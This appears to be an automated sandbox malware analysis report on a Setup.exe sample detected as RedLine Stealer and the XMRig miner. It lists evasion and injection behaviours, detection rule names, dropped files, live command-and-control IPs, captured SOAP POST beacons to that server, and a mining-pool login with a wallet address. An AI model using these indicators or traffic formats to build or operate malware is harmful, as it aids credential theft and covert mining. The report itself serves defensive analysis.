Windows Analysis Report
Setup.exe

Overview

General Information

Sample name: Setup.exe
Analysis ID: 1464883
MD5: 3ba515e7df4c8918a967f4043cd8c72b
SHA1: 3659a765f502297fb92a9d14b08e5b8d91bc8603
SHA256: 5234a3b9c46390f23a13c401cd294dadc63944ed57a19b26ff4e7211442e0482
Tags: exe

Detection

RedLine, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop EventLog
Snort IDS alert for network traffic
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Detected Stratum mining protocol
Drops PE files to the user root directory
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample is not signed and drops a device driver
Sigma detected: Legitimate Application Dropped Archive
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Process Parents
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

AV Detection

Source: Setup.exe Avira: detected
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Avira: detection malicious, Label: TR/ClipBanker.leoyb
Source: 10.0.fix.exe.720000.0.unpack Malware Configuration Extractor: RedLine {"C2 url": ["163.5.160.27:51523"], "Bot Id": "telegramone"}
Source: pool.hashvault.pro Virustotal: Detection: 6%
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Virustotal: Detection: 63%
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe ReversingLabs: Detection: 95%
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe Virustotal: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Virustotal: Detection: 66%
Source: Setup.exe Virustotal: Detection: 59%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Joe Sandbox ML: detected
Source: Setup.exe Joe Sandbox ML: detected

Bitcoin Miner

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 54.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000036.00000002.2912448756.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: global traffic TCP traffic: 192.168.2.4:49740 -> 95.179.241.203:3333 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4agh8zkebtmi6nakn8kytbecuawowbajkj6vedxzmsipjtkywtf1hhadafjn39jtrsxipbhsszqnt2u1jycpsaedmhft2qq","pass":"mergedall","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.
Source: conhost.exe String found in binary or memory: cryptonight-monerov7
Source: Setup.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04F8AF0 FindFirstFileExW,FindClose, 6_2_00007FF7F04F8AF0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 6_2_00007FF7F050842C
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F05124C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 6_2_00007FF7F05124C4
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 6_2_00007FF7F050842C
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BD24C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 18_2_00007FF702BD24C4
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 18_2_00007FF702BC842C
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BB8AF0 FindFirstFileExW,FindClose, 18_2_00007FF702BB8AF0
Source: C:\Users\user\Notepad.exe Code function: 18_2_00007FF702BC842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError, 18_2_00007FF702BC842C
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 015193DCh 7_2_01519118
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 0151BC38h 7_2_0151B740
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 05DE9567h 7_2_05DE8E08
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 05DECFD2h 7_2_05DECBB0
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 05DED452h 7_2_05DECBB0
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 7_2_05DEFA88
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then inc dword ptr [ebp-20h] 7_2_05DE25D8
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 05DEB581h 7_2_05DEB569
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 05DEE455h 7_2_05DEE434
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 05DEC9E5h 7_2_05DEC618
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 05DEC9E5h 7_2_05DEC60A
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 4x nop then jmp 05DEF3E2h 7_2_05DEF130

Networking

Source: Traffic Snort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.4:49731 -> 51.195.206.227:38719
Source: Traffic Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49731 -> 51.195.206.227:38719
Source: Traffic Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 51.195.206.227:38719 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 51.195.206.227:38719 -> 192.168.2.4:49731
Source: Traffic Snort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.4:57809 -> 1.1.1.1:53
Source: Malware configuration extractor URLs: 163.5.160.27:51523
Source: global traffic TCP traffic: 51.195.206.227 ports 1,38719,3,7,8,9
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 51523
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 51523 -> 49743
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 51.195.206.227:38719
Source: global traffic TCP traffic: 192.168.2.4:49732 -> 163.5.160.27:51523
Source: global traffic TCP traffic: 192.168.2.4:49740 -> 95.179.241.203:3333
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 163.5.160.27:51523Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 163.5.160.27:51523Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 163.5.160.27:51523Content-Length: 1037846Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 163.5.160.27:51523Content-Length: 1037838Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 95.179.241.203
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS
Source: Joe Sandbox View ASN Name: OVHFR
Source: Joe Sandbox View ASN Name: EPITECHFR
Source: unknown TCP traffic detected without corresponding DNS query: 51.195.206.227 (29 occurrences)
Source: unknown TCP traffic detected without corresponding DNS query: 163.5.160.27 (21 occurrences)
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE10306260 recv, 19_2_00007FFE10306260
Source: global traffic DNS traffic detected: DNS query: api.ip.sb
Source: global traffic DNS traffic detected: DNS query: pool.hashvault.pro
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 163.5.160.27:51523Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: powershell.exe, 00000001.00000002.1831456949.0000000007983000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m/
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: powershell.exe, 00000001.00000002.1795425039.0000000006349000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000001.00000002.1781685516.0000000005436000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1780597346.00000000033B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1781685516.0000000005436000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1781685516.00000000052E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1781685516.0000000005436000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.1781685516.0000000005436000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1780597346.00000000033B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Notepad.exe, 00000038.00000003.1952149686.00000264D8493000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000001.00000002.1781685516.00000000052E1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: Setup.exe, 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: Setup.exe, 00000000.00000002.1690804968.00000000030F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: Setup.exe, 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: powershell.exe, 00000001.00000002.1795425039.0000000006349000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1795425039.0000000006349000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1795425039.0000000006349000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.1781685516.0000000005436000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1780597346.00000000033B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Setup.exe, 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: powershell.exe, 00000001.00000002.1795425039.0000000006349000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Source: 10.0.fix.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 10.0.fix.exe.720000.0.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.Setup.exe.313a458.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.Setup.exe.313a458.1.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.Setup.exe.313a458.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.Setup.exe.313a458.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 54.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 54.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 54.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0000000A.00000000.1686994806.0000000000722000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000036.00000002.2912448756.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: Setup.exe PID: 6184, type: MEMORYSTR Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\Users\user\AppData\Local\Temp\fix.exe, type: DROPPED Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: C:\Users\user\AppData\Local\Temp\fix.exe, type: DROPPED Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Code function: 3_2_00007FF7010C1394 NtWriteFileGather, 3_2_00007FF7010C1394
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe Code function: 38_2_00007FF7A81D1394 NtDisplayString, 38_2_00007FF7A81D1394
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Code function: 43_2_00007FF7ECBC1394 NtAlpcImpersonateClientOfPort, 43_2_00007FF7ECBC1394
Source: C:\Windows\System32\conhost.exe Code function: 52_2_0000000140001394 NtQueryAttributesFile, 52_2_0000000140001394
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe File created: C:\Windows\TEMP\trxhxvjzqipl.sys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_x4hrlidv.enb.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0337B580 1_2_0337B580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_0337B570 1_2_0337B570
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Code function: 3_2_00007FF7010C3B50 3_2_00007FF7010C3B50
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04F7950 6_2_00007FF7F04F7950
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04F9B8B 6_2_00007FF7F04F9B8B
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F051789C 6_2_00007FF7F051789C
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0516950 6_2_00007FF7F0516950
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050AA10 6_2_00007FF7F050AA10
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0508278 6_2_00007FF7F0508278
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0502270 6_2_00007FF7F0502270
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050EA90 6_2_00007FF7F050EA90
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0503330 6_2_00007FF7F0503330
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0517350 6_2_00007FF7F0517350
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0516BCC 6_2_00007FF7F0516BCC
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0502474 6_2_00007FF7F0502474
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050842C 6_2_00007FF7F050842C
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0514CFC 6_2_00007FF7F0514CFC
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0506510 6_2_00007FF7F0506510
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F05124C4 6_2_00007FF7F05124C4
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0503CC0 6_2_00007FF7F0503CC0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0508CB0 6_2_00007FF7F0508CB0
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04FA55D 6_2_00007FF7F04FA55D
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050842C 6_2_00007FF7F050842C
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04F9D2B 6_2_00007FF7F04F9D2B
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0511518 6_2_00007FF7F0511518
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050E5FC 6_2_00007FF7F050E5FC
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F051A5D8 6_2_00007FF7F051A5D8
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0501E60 6_2_00007FF7F0501E60
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0502680 6_2_00007FF7F0502680
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0502064 6_2_00007FF7F0502064
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0514860 6_2_00007FF7F0514860
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0502884 6_2_00007FF7F0502884
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0511518 6_2_00007FF7F0511518
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F050F110 6_2_00007FF7F050F110
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F05040C4 6_2_00007FF7F05040C4
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04F90C0 6_2_00007FF7F04F90C0
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_01510118 7_2_01510118
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_0151E418 7_2_0151E418
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_01519530 7_2_01519530
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_0151B740 7_2_0151B740
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_0151D6C0 7_2_0151D6C0
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_01519FA0 7_2_01519FA0
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_015186E8 7_2_015186E8
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_01516B97 7_2_01516B97
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_01516BA8 7_2_01516BA8
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_0335DC74 7_2_0335DC74
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEA518 7_2_05DEA518
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEE4E8 7_2_05DEE4E8
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEAC80 7_2_05DEAC80
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE8430 7_2_05DE8430
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE7FC8 7_2_05DE7FC8
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DED788 7_2_05DED788
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE9ED8 7_2_05DE9ED8
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE8E08 7_2_05DE8E08
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE6178 7_2_05DE6178
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DECBB0 7_2_05DECBB0
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEBB48 7_2_05DEBB48
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEFA88 7_2_05DEFA88
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DE5560 7_2_05DE5560
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEA509 7_2_05DEA509
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Code function: 7_2_05DEE4D8 7_2_05DEE4D8
